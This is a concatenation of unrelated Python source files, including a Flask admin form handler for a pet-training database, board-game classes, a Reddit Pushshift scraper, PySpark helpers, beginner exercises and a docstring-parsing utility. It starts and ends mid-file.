"Pet Name": request.form.get('pet_name'),
"Class Name": request.form.get('class_name')
}
# Check for any empty fields (all required in this form)
missing_fields = []
for field in enroll_data.keys():
if enroll_data[field] == "":
missing_fields.append(field)
if len(missing_fields) > 0:
feedback["Enrollments"] = f"Correct missing information: {missing_fields}"
# If no fields missing, do the insert
else:
query = 'INSERT INTO enrollments (pet_id, class_id) VALUES ((SELECT pet_id FROM pets WHERE pet_name = %s), (SELECT class_id FROM classes WHERE class_name = %s))'
data = (enroll_data["Pet Name"],
enroll_data["Class Name"])
try:
result = execute_query(db_connection, query, data)
if result:
feedback["Enrollments"] = f"Added Enrollment {enroll_data['Pet Name']} {enroll_data['Class Name']}"
else:
feedback["Enrollments"] = "Add Enrollment Failed."
except:
feedback["Enrollments"] = "Add Enrollment Failed."
return refresh_admin(feedback)
# If they submitted a new teacher
elif request.form.get('teacher-insert'):
# Get class data from form fields
teacher_data = {
"Teacher First Name": request.form.get('teacher_first_name'),
"Teacher Last Name": request.form.get('teacher_last_name'),
"Teacher Email": request.form.get('teacher_email'),
"Teacher Phone": request.form.get('teacher_phone'),
}
# Check for any empty fields (all required in this form)
missing_fields = []
for field in teacher_data.keys():
if teacher_data[field] == "":
missing_fields.append(field)
if len(missing_fields) > 0:
feedback["Teachers"] = f"Correct missing information: {missing_fields}"
# If no fields missing, do the insert
else:
query = 'INSERT INTO teachers (first_name, last_name, email, phone) VALUES (%s, %s, %s, %s)'
data = (teacher_data["Teacher First Name"],
teacher_data["Teacher Last Name"],
teacher_data["Teacher Email"],
teacher_data["Teacher Phone"])
try:
result = execute_query(db_connection, query, data)
if result:
feedback["Teachers"] = f"Added Teacher {teacher_data['Teacher First Name']} {teacher_data['Teacher Last Name']}"
else:
feedback["Teachers"] = "Add Teacher Failed."
except:
feedback["Teachers"] = "Add Teacher Failed."
return refresh_admin(feedback)
# If they submitted a new vet
elif request.form.get('vet-insert'):
# Get class data from form fields
vet_data = {
"Vet First Name": request.form.get('vet_first_name'),
"Vet Last Name": request.form.get('vet_last_name'),
"Vet Email": request.form.get('vet_email'),
"Vet Phone": request.form.get('vet_phone'),
"Vet Specialty": request.form.get('vet_specialty')
}
# Check for any empty fields (all required in this form)
missing_fields = []
for field in vet_data.keys():
if vet_data[field] == "":
missing_fields.append(field)
if len(missing_fields) > 0:
feedback["Vets"] = f"Correct missing information: {missing_fields}"
# If no fields missing, do the insert
else:
query = 'INSERT INTO vets (first_name, last_name, email, phone, specialty) VALUES (%s, %s, %s, %s, %s)'
data = (vet_data["Vet First Name"],
vet_data["Vet Last Name"],
vet_data["Vet Email"],
vet_data["Vet Phone"],
vet_data["Vet Specialty"])
try:
result = execute_query(db_connection, query, data)
if result:
feedback["Vets"] = f"Added Vet {vet_data['Vet First Name']} {vet_data['Vet Last Name']}"
else:
feedback["Vets"] = "Add Vet Failed."
except:
feedback["Vets"] = "Add Vet Failed."
return refresh_admin(feedback)
# Testing DB connection
@webapp.route('/db-test')
def test_database_connection():
print("Executing a sample query on the database using the credentials from db_credentials.py")
db_connection = connect_to_database()
query = "SELECT * from customers;"
result = execute_query(db_connection, query)
return render_template('db_test.html', rows=result)
'''
@webapp.route('/browse_bsg_people')
#the name of this function is just a cosmetic thing
def browse_people():
print("Fetching and rendering people web page")
db_connection = connect_to_database()
query = "SELECT fname, lname, homeworld, age, id from bsg_people;"
result = execute_query(db_connection, query).fetchall()
print(result)
return render_template('people_browse.html', rows=result)
@webapp.route('/add_new_people', methods=['POST','GET'])
def add_new_people():
db_connection = connect_to_database()
if request.method == 'GET':
query = 'SELECT id, name from bsg_planets'
result = execute_query(db_connection, query).fetchall()
print(result)
return render_template('people_add_new.html', planets = result)
elif request.method == 'POST':
print("Add new people!")
fname = request.form['fname']
lname = request.form['lname']
age = request.form['age']
homeworld = request.form['homeworld']
query = 'INSERT INTO bsg_people (fname, lname, age, homeworld) VALUES (%s,%s,%s,%s)'
data = (fname, lname, age, homeworld)
execute_query(db_connection, query, data)
return ('Person added!')
@webapp.route('/')
def index():
return "<p>Are you looking for /db_test or /hello or <a href='/browse_bsg_people'>/browse_bsg_people</a> or /add_new_people or /update_people/id or /delete_people/id </p>"
@webapp.route('/home')
def home():
db_connection = connect_to_database()
query = "DROP TABLE IF EXISTS diagnostic;"
execute_query(db_connection, query)
query = "CREATE TABLE diagnostic(id INT PRIMARY KEY, text VARCHAR(255) NOT NULL);"
execute_query(db_connection, query)
query = "INSERT INTO diagnostic (text) VALUES ('MySQL is working');"
execute_query(db_connection, query)
query = "SELECT * from diagnostic;"
result = execute_query(db_connection, query)
for r in result:
print(f"{r[0]}, {r[1]}")
return render_template('home.html', result = result)
@webapp.route('/db_test')
def test_database_connection():
print("Executing a sample query on the database using the credentials from db_credentials.py")
db_connection = connect_to_database()
query = "SELECT * from bsg_people;"
result = execute_query(db_connection, query)
return render_template('db_test.html', rows=result)
#display update form and process any updates, using the same function
@webapp.route('/update_people/<int:id>', methods=['POST','GET'])
def update_people(id):
print('In the function')
db_connection = connect_to_database()
#display existing data
if request.method == 'GET':
print('The GET request')
people_query = 'SELECT id, fname, lname, homeworld, age from bsg_people WHERE id = %s' % (id)
people_result = execute_query(db_connection, people_query).fetchone()
if people_result == None:
return "No such person found!"
planets_query = 'SELECT id, name from bsg_planets'
planets_results = execute_query(db_connection, planets_query).fetchall()
print('Returning')
return render_template('people_update.html', planets = planets_results, person = people_result)
elif request.method == 'POST':
print('The POST request')
character_id = request.form['character_id']
fname = request.form['fname']
lname = request.form['lname']
age = request.form['age']
homeworld = request.form['homeworld']
query = "UPDATE bsg_people SET fname = %s, lname = %s, age = %s, homeworld = %s WHERE id = %s"
data = (fname, lname, age, homeworld, character_id)
result = execute_query(db_connection, query, data)
print(str(result.rowcount) + " row(s) updated")
return redirect('/browse_bsg_people')
@webapp.route('/delete_people/<int:id>')
def delete_people(id):
# deletes a person with the given id
db_connection = connect_to_database()
query = "DELETE FROM bsg_people WHERE id = %s"
data = (id,)
result = execute_query(db_connection, query, data)
return (str(result.rowcount) + "row deleted")
'''
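# A hypothetical helper (not used by the routes above) sketching how the
# repeated "collect form fields and report the empty ones" pattern of the
# insert handlers could be consolidated; `field_map` maps display labels to
# form field names. This is an illustration only.
def collect_required_fields(form, field_map):
    data = {label: form.get(name, "") for label, name in field_map.items()}
    missing = [label for label, value in data.items() if not value]
    return data, missing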
|
# This file is modified from the code off the book Python in Practice by
# Mark Summerfield. Copyright © 2012-13 Qtrac Ltd. All rights reserved.
# This program or module is free software: you can redistribute it
# and/or modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version. It is provided for
# educational purposes and is distributed in the hope that it will be
# useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
import itertools
DRAUGHT, PAWN, ROOK, KNIGHT, BISHOP, KING, QUEEN = (
"DRAUGHT", "PAWN", "ROOK", "KNIGHT", "BISHOP", "KING", "QUEEN")
BLACK, WHITE = ("BLACK", "WHITE")
def console(char, background):
if char is None:
return chr(0x2B1B) if background == BLACK else chr(0x2B1C)
else:
return char
class AbstractBoard:
def __init__(self, rows=8, columns=8):
self.board = [[None for _ in range(columns)] for _ in range(rows)]
def populate_board(self):
raise NotImplementedError()
def __str__(self):
squares = []
for y, row in enumerate(self.board):
for x, piece in enumerate(row):
square = console(piece, BLACK if (y + x) % 2 else WHITE)
squares.append(square)
squares.append("\n")
return "".join(squares)
class CheckersBoard(AbstractBoard):
def __init__(self):
super().__init__(10, 10)
self.name = "checkers"
self.populate_board()
def populate_board(self):
def black():
return create_piece(DRAUGHT, BLACK)
def white():
return create_piece(DRAUGHT, WHITE)
rows = ((None, black()), (black(), None), (None, black()),
(black(), None),
(None, None), (None, None),
(None, white()), (white(), None), (None, white()),
(white(), None)) # 4 white rows
self.board = [list(itertools.islice(
itertools.cycle(squares), 0, len(rows))) for squares in rows]
class ChessBoard(AbstractBoard):
def __init__(self):
super().__init__(8, 8)
self.name = "chess"
self.populate_board()
def populate_board(self):
for row, color in ((0, BLACK), (7, WHITE)):
for columns, kind in (((0, 7), ROOK), ((1, 6), KNIGHT),
((2, 5), BISHOP), ((3,), QUEEN),
((4,), KING)):
for column in columns:
self.board[row][column] = create_piece(kind, color)
for column in range(8):
for row, color in ((1, BLACK), (6, WHITE)):
self.board[row][column] = create_piece(PAWN, color)
class ReversiBoard(AbstractBoard):
def __init__(self):
super().__init__(8, 8)
self.name = "reversi"
self.populate_board()
def populate_board(self):
start_squares = ((3, 3, WHITE), (3, 4, BLACK),
(4, 3, BLACK), (4, 4, WHITE))
for i in range(len(start_squares)):
row, column, color = start_squares[i]
self.board[row][column] = create_piece(DRAUGHT, color)
def __str__(self):
squares = []
for y, row in enumerate(self.board):
for x, piece in enumerate(row):
square = console(piece, WHITE)
squares.append(square)
squares.append("\n")
return "".join(squares)
def create_piece(kind, color):
color = "White" if color == WHITE else "Black"
name = {DRAUGHT: "Draught", PAWN: "ChessPawn", ROOK: "ChessRook",
KNIGHT: "ChessKnight", BISHOP: "ChessBishop",
KING: "ChessKing", QUEEN: "ChessQueen"}[kind]
return globals()[color + name]()
class Piece(str):
__slots__ = ()
emoji_code = {
"WhiteDraught": 0x26AA,
"WhiteChessPawn": 0x1F467,
"WhiteChessRook": 0x26EA,
"WhiteChessKnight": 0x1F417,
"WhiteChessBishop": 0x1F472,
"WhiteChessKing": 0x1F474,
"WhiteChessQueen": 0x1F478,
"BlackDraught": 0x26AB,
"BlackChessPawn": 0x1F466,
"BlackChessRook": 0x1F3E4,
"BlackChessKnight": 0x1F40E,
"BlackChessBishop": 0x1F473,
"BlackChessKing": 0x1F468,
"BlackChessQueen": 0x1F470
}
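# Dynamically create one Piece subclass per entry in emoji_code; the nested
# lambda captures `char` by value so each generated __new__ returns its own
# symbol rather than the last one bound in the loop.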
for name, code in emoji_code.items():
char = chr(code)
new = (lambda char: lambda Class: Piece.__new__(Class, char))(char)
new.__name__ = "__new__"
Class = type(name, (Piece,), dict(__slots__=(), __new__=new))
globals()[name] = Class
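# A minimal usage sketch (not part of the original module): build each board
# variant and print its console representation.
if __name__ == "__main__":
    for board in (CheckersBoard(), ChessBoard(), ReversiBoard()):
        print(board.name)
        print(board)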
|
# -*- coding: utf-8 -*-
'''
# Copyright (c) Microsoft Corporation. All Rights Reserved. Licensed under the MIT License. See License in the project root for license information.
#
# This file was generated and any changes will be overwritten.
'''
from __future__ import unicode_literals
from ..one_drive_object_base import OneDriveObjectBase
class SettingStateDeviceSummary(OneDriveObjectBase):
def __init__(self, prop_dict={}):
self._prop_dict = prop_dict
@property
def setting_name(self):
"""
Gets and sets the settingName
Returns:
str:
The settingName
"""
if "settingName" in self._prop_dict:
return self._prop_dict["settingName"]
else:
return None
@setting_name.setter
def setting_name(self, val):
self._prop_dict["settingName"] = val
@property
def instance_path(self):
"""
Gets and sets the instancePath
Returns:
str:
The instancePath
"""
if "instancePath" in self._prop_dict:
return self._prop_dict["instancePath"]
else:
return None
@instance_path.setter
def instance_path(self, val):
self._prop_dict["instancePath"] = val
@property
def unknown_device_count(self):
"""
Gets and sets the unknownDeviceCount
Returns:
int:
The unknownDeviceCount
"""
if "unknownDeviceCount" in self._prop_dict:
return self._prop_dict["unknownDeviceCount"]
else:
return None
@unknown_device_count.setter
def unknown_device_count(self, val):
self._prop_dict["unknownDeviceCount"] = val
@property
def not_applicable_device_count(self):
"""
Gets and sets the notApplicableDeviceCount
Returns:
int:
The notApplicableDeviceCount
"""
if "notApplicableDeviceCount" in self._prop_dict:
return self._prop_dict["notApplicableDeviceCount"]
else:
return None
@not_applicable_device_count.setter
def not_applicable_device_count(self, val):
self._prop_dict["notApplicableDeviceCount"] = val
@property
def compliant_device_count(self):
"""
Gets and sets the compliantDeviceCount
Returns:
int:
The compliantDeviceCount
"""
if "compliantDeviceCount" in self._prop_dict:
return self._prop_dict["compliantDeviceCount"]
else:
return None
@compliant_device_count.setter
def compliant_device_count(self, val):
self._prop_dict["compliantDeviceCount"] = val
@property
def remediated_device_count(self):
"""
Gets and sets the remediatedDeviceCount
Returns:
int:
The remediatedDeviceCount
"""
if "remediatedDeviceCount" in self._prop_dict:
return self._prop_dict["remediatedDeviceCount"]
else:
return None
@remediated_device_count.setter
def remediated_device_count(self, val):
self._prop_dict["remediatedDeviceCount"] = val
@property
def non_compliant_device_count(self):
"""
Gets and sets the nonCompliantDeviceCount
Returns:
int:
The nonCompliantDeviceCount
"""
if "nonCompliantDeviceCount" in self._prop_dict:
return self._prop_dict["nonCompliantDeviceCount"]
else:
return None
@non_compliant_device_count.setter
def non_compliant_device_count(self, val):
self._prop_dict["nonCompliantDeviceCount"] = val
@property
def error_device_count(self):
"""
Gets and sets the errorDeviceCount
Returns:
int:
The errorDeviceCount
"""
if "errorDeviceCount" in self._prop_dict:
return self._prop_dict["errorDeviceCount"]
else:
return None
@error_device_count.setter
def error_device_count(self, val):
self._prop_dict["errorDeviceCount"] = val
@property
def conflict_device_count(self):
"""
Gets and sets the conflictDeviceCount
Returns:
int:
The conflictDeviceCount
"""
if "conflictDeviceCount" in self._prop_dict:
return self._prop_dict["conflictDeviceCount"]
else:
return None
@conflict_device_count.setter
def conflict_device_count(self, val):
self._prop_dict["conflictDeviceCount"] = val
|
#!/usr/bin/env python
# Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
# SPDX-License-Identifier: Apache-2.0
import test.logger_test_helper
import logging
from test.fixtures.quicksight_test_fixture import dump_env
logger = logging.getLogger(__name__)
def check_env():
dump_env()
if __name__ == "__main__":
check_env()
|
import media
toy_story = media.Movie("Toy Story",
"A story of a boy and his toys that come to life",
"https://upload.wikimedia.org/wikipedia/en/1/13/Toy_Story.jpg",
"https://www.youtube.com/watch?v=KYz2wyBy3kc")
print(toy_story.storyline)
avatar = media.Movie("Avatar",
"A marine on an alien planet",
"https://upload.wikimedia.org/wikipedia/en/b/b0/Avatar-Teaser-Poster.jpg",
"https://www.youtube.com/watch?v=cRdxXPV9GNQ")
print(avatar.storyline)
# avatar.show_trailer()
scent_of_a_woman = media.Movie("Scent of a Woman",
"Whoo-ah!",
"https://upload.wikimedia.org/wikipedia/en/9/91/Scent_of_a_Woman.jpg",
"https://www.youtube.com/watch?v=ebDO0C-RTpU")
print(scent_of_a_woman.storyline)
scent_of_a_woman.show_trailer()
|
# GIL: global interpreter lock (CPython)
# One Python thread corresponds to one C-level thread
# The GIL means only one thread at a time can execute bytecode on a CPU
# The GIL switches threads based on the number of bytecodes executed and on time slices, so threads cannot be spread across multiple CPUs; the GIL is released voluntarily on I/O operations
# For I/O-bound work, multithreading and multiprocessing perform about the same
# Sharing state: plain shared variables vs. Queue
# PyPy-style libraries/interpreters that remove the GIL
# The GIL is released after a number of bytecodes / a time slice, and also around I/O operations
# Differences between the GIL in Python 2 and Python 3
# Difference between Python (the language) and CPython (the implementation)
# ============= inspect bytecode with dis =============
# import dis
#
#
# def add(a):
# a = a + 1
# return a
#
#
# print(dis.dis(add))
# ============= inspect bytecode with dis =============
total = 0
def add():
global total
for i in range(1000000):
total += 1
def des():
global total
for i in range(1000000):
total -= 1
import threading
thread1 = threading.Thread(target=add)
thread2 = threading.Thread(target=des)
thread1.start()
thread2.start()
thread1.join()
thread2.join()
print(total)
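# A minimal sketch (not part of the original snippet): because `total += 1`
# compiles to several bytecodes, a thread switch can interleave the two loops
# above and the printed result varies between runs. Guarding the shared
# variable with an explicit lock makes the outcome deterministic.
lock = threading.Lock()
safe_total = 0


def safe_add():
    global safe_total
    for i in range(1000000):
        with lock:
            safe_total += 1


def safe_des():
    global safe_total
    for i in range(1000000):
        with lock:
            safe_total -= 1


t1 = threading.Thread(target=safe_add)
t2 = threading.Thread(target=safe_des)
t1.start()
t2.start()
t1.join()
t2.join()
print(safe_total)  # always 0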
|
import pyspark.sql.functions as f
import pyspark.sql.types as t
from pyspark.sql.dataframe import DataFrame
from unidecode import unidecode
import numpy as np
import os
import re
def get_spark_versions() -> 'tuple[str, str]':
spark_home = os.environ['SPARK_HOME']
spark_version = re.search('(?<=spark-).+(?=-bin)', spark_home).group(0)
hadoop_version = re.search('(?<=hadoop).+', spark_home).group(0)
return (spark_version, hadoop_version)
spark_version, hadoop_version = get_spark_versions()
if int(spark_version[0]) < 3:
def transform(self, f) -> DataFrame:
return f(self)
DataFrame.transform = transform
# UDFs
@f.udf(returnType=t.StringType())
def unidecode_udf(string):
if not string:
return None
else:
return unidecode(string)
@f.udf(returnType=t.DoubleType())
def convert_decimal_udf(string):
if string is None:
return None
else:
string = string.replace(",", ".")
return float(string.replace(".", "", string.count(".") - 1))
@f.udf(returnType=t.FloatType())
def array_product_udf(array):
if not array:
return None
else:
array = [e for e in array if e is not None]
return float(np.prod(array))
@f.udf(returnType=t.FloatType())
def array_sum_udf(array):
if not array:
return None
else:
array = [e for e in array if e is not None]
return sum(array)
# Custom methods
def df_from_struct(cols, extract_col, explode) -> DataFrame:
def _(df):
if explode:
df = df.withColumn(extract_col, f.explode(extract_col))
struct_cols = df.select(f'{extract_col}.*').columns
renamed_cols = []
for c in struct_cols:
col_ref = f.col(f'{extract_col}.' + c)
if c in cols:
renamed_cols.append(col_ref.alias(c + '_struct'))
else:
renamed_cols.append(col_ref)
return df.select(*cols, *renamed_cols)
return _
def renamer(dict) -> DataFrame:
def _(df):
for c, n in dict.items():
df = df.withColumnRenamed(c, n)
return df
return _
def unpivot(*args, col_name="categorias", value_name="valor") -> DataFrame:
if not args[0]:
key_cols = []
else:
key_cols = args[0] if type(args[0]) is list else args
def _(df):
unpivot_cols = [c for c in df.columns if c not in key_cols]
groups_str = [f"'{i}', `{i}`" for i in unpivot_cols]
unpivot_string = ", ".join(groups_str)
unpivot_query = "stack({}, {}) as ({}, {})".format(
len(unpivot_cols), unpivot_string, col_name, value_name
)
return df.selectExpr(*key_cols, unpivot_query)
return _
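# A minimal usage sketch (not part of the original module; the column names
# and data below are made up): rename a column and then unpivot the month
# columns into long format using the helpers defined above.
if __name__ == "__main__":
    from pyspark.sql import SparkSession

    spark = SparkSession.builder.getOrCreate()
    df = spark.createDataFrame([("a", 1, 2), ("b", 3, 4)], ["id", "jan", "fev"])
    long_df = (
        df.transform(renamer({"fev": "feb"}))
          .transform(unpivot(["id"], col_name="month", value_name="value"))
    )
    long_df.show()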
|
# 3. Create a structure to represent a product (code, name, price). Create a function to register 5 products. Create another function to apply a 10% increase to the product price and, through yet another function, display all the data of the registered products after the increase. Build a function for each option of the menu below:
# System Menu
# Register
# Adjust prices
# View
# Exit
# Which option do you want?
class produto:
codigo = 0
nome = ''
preco = 0.0
def menu():
print('1. Cadastrar')
print('2. Reajustar')
print('3. Visualizar')
print('4. Sair')
print()
opcao = int(input('Qual opção deseja? '))
return opcao
def cadastrar(vet):
for i in range(2): # the exercise asks for 5 products: for i in range(5)
p = produto()
p.codigo = int(input('Digite o código do produto: '))
p.nome = input('Digite o nome do produto: ')
p.preco = float(input('Digite o preço do produto: R$ '))
vet.append(p)
print()
return vet
def aumentar(vet):
if len(vet) > 0:
for i in range(len(vet)):
vet[i].preco = vet[i].preco + (vet[i].preco * (10 / 100))
print('Reajuste realizado com sucesso.\n')
else:
print('Não há produtos cadastrados.\n')
return vet
def apresentar(vet):
if len(vet) > 0:
for i in range(len(vet)):
print('Código do produto: {} \tNome do produto: {} \tPreço do produto: R$ {:.2f}'.format(vet[i].codigo,vet[i].nome,vet[i].preco))
print()
else:
print('Não há produtos cadastrados.\n')
def main():
vetor_produto = []
x = menu() #com "break"
while x > 0:
print()
if x == 1:
vetor_produto = cadastrar(vetor_produto)
elif x == 2:
vetor_produto = aumentar(vetor_produto)
elif x == 3:
apresentar(vetor_produto)
elif x == 4:
print('Saindo...')
break
else:
print('Comando Inválido. Tente Novamente.\n')
x = menu()
main()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
""" Function to search reddit comments and submissions and
return all metadata available and return a dataFrame """
import pandas as pd
import requests
import json
import csv
import time
import datetime
def RedditSearch(query, before='', after='', search_type='hybrid'):
'''
query (string)
after (UTC Timestamp) *** Note that these must be integers ***
DEFAULT: 7 Days before now
before (UTC Timestamp)
DEFAULT: now
search_type (string)
'comment' -> only search comments
'submission' -> only search submissions
'hybrid' -> search both comments and submissions
'''
# Defaults
today = datetime.datetime.utcnow().timestamp()
delta_time = datetime.timedelta(days=7)
if not after or not before:
after = datetime.datetime.now() - delta_time
after = int(after.timestamp())
before = int(today)
print('UTC Before:', before)
print('UTC After:', after)
search_type = search_type.lower()
if search_type not in ['comment', 'submission', 'hybrid']:
print('Unknown search_type, defaulting to hybrid')
search_type = 'hybrid'
subCount = 0 # data counter
commCount = 0 # data counter
subStats = {} # data for storage
commStats = {} #data storage
subList = []
commList = []
# subfunctions
def getPushshiftData_Submission(query, after, before):
'''
query(String) string to search that
after (Timestamp)
before (Timestamp)
'''
url = 'https://api.pushshift.io/reddit/search/submission/?q='+str(query)+\
'&size=1000&after='+str(after)+'&before='+str(before)
# url params well documented at https://github.com/pushshift/api for both comments and submissions
r = requests.get(url)
data = json.loads(r.text)
return data['data']
def getPushshiftData_Comments(query, after, before):
'''
query(String) string to search that
after (Timestamp)
before (Timestamp)
'''
url = 'https://api.pushshift.io/reddit/search/comment/?q='+str(query)+\
'&size=1000&after='+str(after)+'&before='+str(before)
# url params well documented at https://github.com/pushshift/api for both comments and submissions
r = requests.get(url)
data = json.loads(r.text)
return data['data']
try:
# Collect Submissions
# Get initial Submissions that fit query
if search_type != 'comment':
print('Beginning Submission Query')
data = getPushshiftData_Submission(query, after, before)
# Will run until all posts have been gathered i.e. When the length of data variable = 0
# from the 'after' date up until before date
while len(data) > 0:
after_ = int(data[-1]['created_utc'])
for submission in data:
submission['created_utc'] = datetime.datetime.fromtimestamp(submission['created_utc'])
subCount+=1
subList.append(submission)
# Calls getPushshiftData() with the created date of the last submission
print('Oldest Post Date:' + str(data[-1]['created_utc']))
#update after variable to last created date of submission
#data has changed due to the new after variable provided by above code
data = getPushshiftData_Submission(query, after_, before)
print('Submission Query Finished')
# Collect Comments
if search_type != 'submission':
print('Beginning Comment Query')
data = getPushshiftData_Comments(query, after, before)
# Will run until all posts have been gathered i.e. When the length of data variable = 0
# from the 'after' date up until before date
while len(data) > 0:
after_ = int(data[-1]['created_utc'])
for comment in data:
comment['created_utc'] = datetime.datetime.fromtimestamp(comment['created_utc'])
commCount+=1
commList.append(comment)
# Calls getPushshiftData() with the created date of the last submission
print('Oldest Comment Date:' + str((data[-1]['created_utc'])))
#update after variable to last created date of submission
#data has changed due to the new after variable provided by above code
data = getPushshiftData_Comments(query, after_, before)
print('Comment Query Finished')
except:
print('Error while Processing')
# Convert the collected lists to DataFrames (all Pushshift fields are kept)
print('Building Output')
subDf = pd.DataFrame(subList)
# subDf = subDf.set_index('created_utc')
commDf = pd.DataFrame(commList)
# commDf = commDf.set_index('created_utc')
print('Number of Submissions Collected:', subCount)
print('Number of Comments Collected:', commCount)
return subDf, commDf
submissions, comments = RedditSearch('gummy bears')
submissions.to_csv('submissions.csv')
comments.to_csv('comments.csv')
|
class dictionary_iter:
def __init__(self, dict_obj):
self.dict_obj = dict_obj
self.dict_keys = list(self.dict_obj.keys())
self.start = 0
self.end = len(self.dict_obj)
def __iter__(self):
return self
def __next__(self):
if self.end == self.start:
raise StopIteration
i = self.start
current_result = (self.dict_keys[i], self.dict_obj[self.dict_keys[i]], )
self.start += 1
return current_result
result = dictionary_iter({1: "1", 2: "2"})
for x in result:
print(x)
|
#!/opt/bin/lv_micropython -i
import time
import lvgl as lv
import display_driver
from lv_colors import lv_colors
obj1 = lv.obj(lv.scr_act(),None)
obj1.set_size(100,50)
obj1.align(None,lv.ALIGN.CENTER, -60, -30)
# Copy the previous object and enable drag
obj2 = lv.obj(lv.scr_act(),obj1)
#obj2.set_size(100,50)
obj2.align(None,lv.ALIGN.CENTER, 0, 0)
obj2.set_drag(True)
# create style
style_shadow = lv.style_t()
style_shadow.init()
style_shadow.set_shadow_width(lv.STATE.DEFAULT, 10)
style_shadow.set_shadow_spread(lv.STATE.DEFAULT, 5)
style_shadow.set_shadow_color(lv.STATE.DEFAULT,lv_colors.BLUE)
# Copy the previous object (drag is already enabled)
obj3 = lv.obj(lv.scr_act(),obj2)
obj3.add_style(obj3.PART.MAIN,style_shadow)
obj3.align(None,lv.ALIGN.CENTER, 60, 30)
|
""" Production Livestock """
# Django
from django.db import models
DESTINATIONS_CHOICES = (
("Venta","Venta"),
("Consumo","Consumo"),
("Ambos","Ambos"),
("Trueque","Trueque"),
("Otros","Otros")
)
class ProductionLivestock(models.Model):
""" Modelos de producción ganadera"""
production = models.ForeignKey(
"producer.Production",
related_name="production_livestock",
on_delete=models.CASCADE)
type_activity = models.CharField(max_length=30)
surface = models.FloatField(default=0)
destination = models.CharField(max_length=30)
make_technical_assistance = models.BooleanField()
problems = models.CharField(max_length=200, blank=True, null=True)
suggestion = models.CharField(max_length=200, blank=True, null=True)
def __str__(self):
return 'Producción Ganadera: {}'.format(self.production.producer)
|
#!/usr/bin/python3
import filemanager
import grads
import sys
VERSION = "1.0"
auvidir = ""
def main(args):
greet()
run()
def run():
filemanager.createOutputDirs()
auvidir = filemanager.getAuViDir()
outdir = auvidir + "output/"
gradsdir = auvidir + "grads/"
gradsline = gradsdir + "line.gs"
gradsplot = gradsdir + "plot.gs"
loc = filemanager.getLoc()
locpara = filemanager.getLocPara()
arepara = filemanager.getArePara()
for location in loc:
name = location[0]
lat = location[1]
lon = location[2]
gmt = location[4]
for attr in locpara:
dirname = attr[1]
title = attr[0]
tend = "grads"
unit = attr[3]
params = attr[2]
print((name + " " + dirname + " " + tend))
grads.call(gradsline, outdir, name, lat, lon, gmt,
dirname, title, tend, unit, params)
for para in arepara:
for location in loc:
print((location[0] + " " + para[1]))
grads.area(gradsplot, outdir, location[0], location[1], location[2], location[
3], location[4], para[0], para[1], para[2], auvidir + "grads/" + para[4])
filemanager.convertToGifs()
filemanager.convertGifToMp4(6,1,1)
filemanager.moveOutputToWeb()
def greet():
print(("This is Python-AuVi Version: " + str(VERSION)))
if __name__ == "__main__":
main(sys.argv[1:])
|
import re
from textwrap import dedent, TextWrapper
from collections import defaultdict
def _is_valid_alias_source(spec, key):
return key != spec.varkw
def _is_valid_arg(spec, key):
return (key in spec.args or
key == spec.varargs or
key == spec.varkw or
key in spec.kwonlyargs)
arg_doc_pattern = re.compile(r'^-{,2}([^\d\W]\w*):\s{1,}(.+)')
alias_pattern = re.compile(r'^-{,2}([^\d\W]\w*):\s{1,}(-{1,2}[^\d\W]\w*)$')
def _normalize_argument_docs(spec, section):
"""Parse arg docs into entries and aliases
An arg entry has a key in spec.{args, kwonlydefaults, varargs, varkw}
and a value that may wrap across multiple lines. For instance:
aa: the meaning of aa, wrapped in multiple lines. It
doesn't necessarily need to be indented, though.
An arg alias has a key and a value that follow stricter rules. The value
should name an argument in the spec. For instance:
-a: --aa
The action when users specify -a in the CLI depends on the role and type
of --aa.
If **kwargs exists, aliases may also appear in the arg-entry format. These
aliases are added to the available switches. Without **kwargs, this
type of alias is not allowed.
"""
waiting = section.split('\n')
docs, aliases = {}, {}
last_key = None
while waiting:
line = waiting.pop(0).rstrip()
matched = arg_doc_pattern.search(line) or alias_pattern.search(line)
if matched is None:
if last_key in docs:
line = ' ' + line.strip()
docs[last_key] = '{}\n{}'.format(
docs[last_key].rstrip(), line.lstrip())
else:
key, value = matched.groups()
if value.startswith('-'):
# for alias,
# argument_docs values don't start with '-'
key, value = key.lstrip('-'), value.lstrip('-')
if _is_valid_arg(spec, key):
raise ValueError(
"Key '{}' for aliasing has bee used.".format(key))
if _is_valid_alias_source(spec, value):
aliases[key] = value
last_key = key
else:
last_key = None
else:
if _is_valid_arg(spec, key):
docs[key] = value
last_key = key
elif spec.varkw is not None:
spec.kwonlyargs.append(key)
spec.kwonlydefaults[key] = False
spec.annotations[key] = bool
docs[key] = value
last_key = key
else:
last_key = None
return docs, aliases
candidate_headers_ending = (
'arg:',
'args:',
'argument:',
'arguments:',
'flag:',
'flags:',
'switch:',
'switches:',
)
def load_doc_hints(spec, docstring): # noqa
spec.descriptions = []
spec.argument_docs = {}
spec.aliases = {}
sections = [dedent(sec).strip()
for sec in docstring.split('\n\n')]
for section in sections:
if not section:
continue
original_section = section
header, *contents = section.split('\n', maxsplit=1)
if any(header.lower().endswith(item)
for item in candidate_headers_ending) and contents:
section = dedent(contents[0])
print(section)
argument_docs, aliases = _normalize_argument_docs(spec, section)
if not argument_docs and not aliases:
spec.descriptions.append(original_section)
else:
spec.argument_docs.update(**argument_docs)
spec.aliases.update(**aliases)
return spec
def _get_one_argument_doc(key, doc, width, tabstop):
key = ' ' + key + ' '
if len(key) > tabstop:
wrapper = TextWrapper(
initial_indent=' '*tabstop,
width=width-tabstop, subsequent_indent=' '*tabstop)
return key.rstrip() + '\n' + '\n'.join(wrapper.wrap(doc))
else:
wrapper = TextWrapper(
initial_indent=' '*(tabstop-len(key)),
width=width-tabstop, subsequent_indent=' '*tabstop)
return key + '\n'.join(wrapper.wrap(doc))
def _prefix_key(key):
return '-' + key if len(key) == 1 else '--' + key
def get_normalized_docstring(spec, width=70, tabstop=16):
sections = []
if hasattr(spec, 'descriptions'):
sections.append('\n\n'.join(text for text in spec.descriptions))
if hasattr(spec, 'argument_docs') and hasattr(spec, 'aliases'):
items = ['Arguments:']
aliases = defaultdict(list)
for alias, source in spec.aliases.items():
aliases[source].append(_prefix_key(alias))
candidates = []
candidates.extend(spec.args)
if spec.varargs:
candidates.append(spec.varargs)
candidates.extend(spec.kwonlyargs)
for key in candidates:
if key not in spec.argument_docs:
continue
